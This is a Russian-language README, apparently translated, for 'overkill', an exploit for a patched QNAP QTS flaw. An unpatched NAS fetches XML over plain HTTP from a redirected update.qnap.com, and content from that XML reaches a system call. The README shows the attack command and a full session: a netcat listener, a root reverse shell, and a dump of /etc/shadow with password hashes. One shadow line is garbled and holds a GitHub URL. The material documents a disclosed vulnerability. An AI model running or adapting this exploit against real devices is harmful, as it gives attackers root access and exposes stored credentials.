
QNAP N-Day (Вероятно, не CVE-2020-2509)
Overkill — это эксплойт для исправленной уязвимости, затрагивающей QNAP QTS. Из-за того, как QNAP раскрывает уязвимости, я не уверен, есть ли у этой проблемы CVE или нет. Однако, скорее всего, она была исправлена в ноябре 2020 года и апреле 2021 года. N-day была "обнаружена" при анализе diff для CVE-2020-2509. Это почти наверняка не CVE-2020-2509.
Эксплойт отправляет HTTP GET-запросы на /cgi-bin/qnapmsg.cgi?lang=xxx, что заставляет незапатченные устройства QNAP загружать XML-файл с update.qnap.com через незащищенный HTTP. Атакующий, который может перенаправить update.qnap.com на себя, может ответить управляемым атакующим XML-файлом. Когда QNAP анализирует XML-файл, он передает некоторые его содержимое в вызов system, что приводит к реверсивной оболочке.
Этот эксплойт не реализует метод перенаправления запросов update.qnap.com на эксплойт. В приведенном ниже примере я использовал перехват DNS на моем собственном маршрутизаторе... ваш опыт может отличаться.
albinolobster@ubuntu:~/overkill$ sudo python3 overkill.py --rhost 10.12.70.251 --lhost 10.12.70.252
01001001001000000110001101100001011011100010011101110100001000000110011101100101
______ ___ ___ _______ _______ __ ___ __ ___ ___
/ " \|" \ /" |/" "| /" \ |/"| / ") |" \ |" | |" |
// ____ \\ \ // /(: ______)|: |(: |/ / || | || | || |
/ / ) :)\\ \/. ./ \/ | |_____/ )| __/ |: | |: | |: |
(: (____/ // \. // // ___)_ // / (// _ \ |. | \ |___ \ |___
\ / \\ / (: "||: __ \ |: | \ \ /\ |\( \_|: \( \_|: \
\"_____/ \__/ \_______)|__| \___)(__| \__)(__\_|_)\_______)\_______)
01110100001000000111010001101111001000000111001101101100011001010110010101110000
🦞 jbaines-r7
[+] Forking a netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Spinning up HTTP server
[!] Attempting http://10.12.70.251:8080/cgi-bin/qnapmsg.cgi?lang=eng
[+] Received an HTTP request from 10.12.70.251 on 27/Jul/2022 11:58:23
[*] Requested /loginad//qnapmsg_eng.xml
10.12.70.251 - - [27/Jul/2022 11:58:23] "GET /loginad//qnapmsg_eng.xml HTTP/1.1" 200 -
Connection received on 10.12.70.251 44630
bash-3.2# uname -a
uname -a
Linux NAS4A32F3 4.2.8 #1 SMP Sun Nov 8 01:50:48 CST 2020 aarch64 GNU/Linux
bash-3.2# id
id
uid=0(admin) gid=0(administrators)
bash-3.2# cat /etc/shadow
cat /etc/shadow
admin:!$1$5pFeLUat$D8jTQogWJy0HF3XjkD13q/:19181:0:99999:7:::
guest:$1$$ysap7EeB9ODCrO46Psdbq/:14233:0:99999:7:::
httpdusr:!:19181:0:99999:7:::
albinolobster:$1$cZCC65z5$NXtIBB4hgqzVG.PHyShKh1:19195:0:99999:7:::
[sshd]:https://raw.githubusercontent.com/jbaines-r7/overkill/HEAD/!:19181:0:99999:7:::
bash-3.2# exit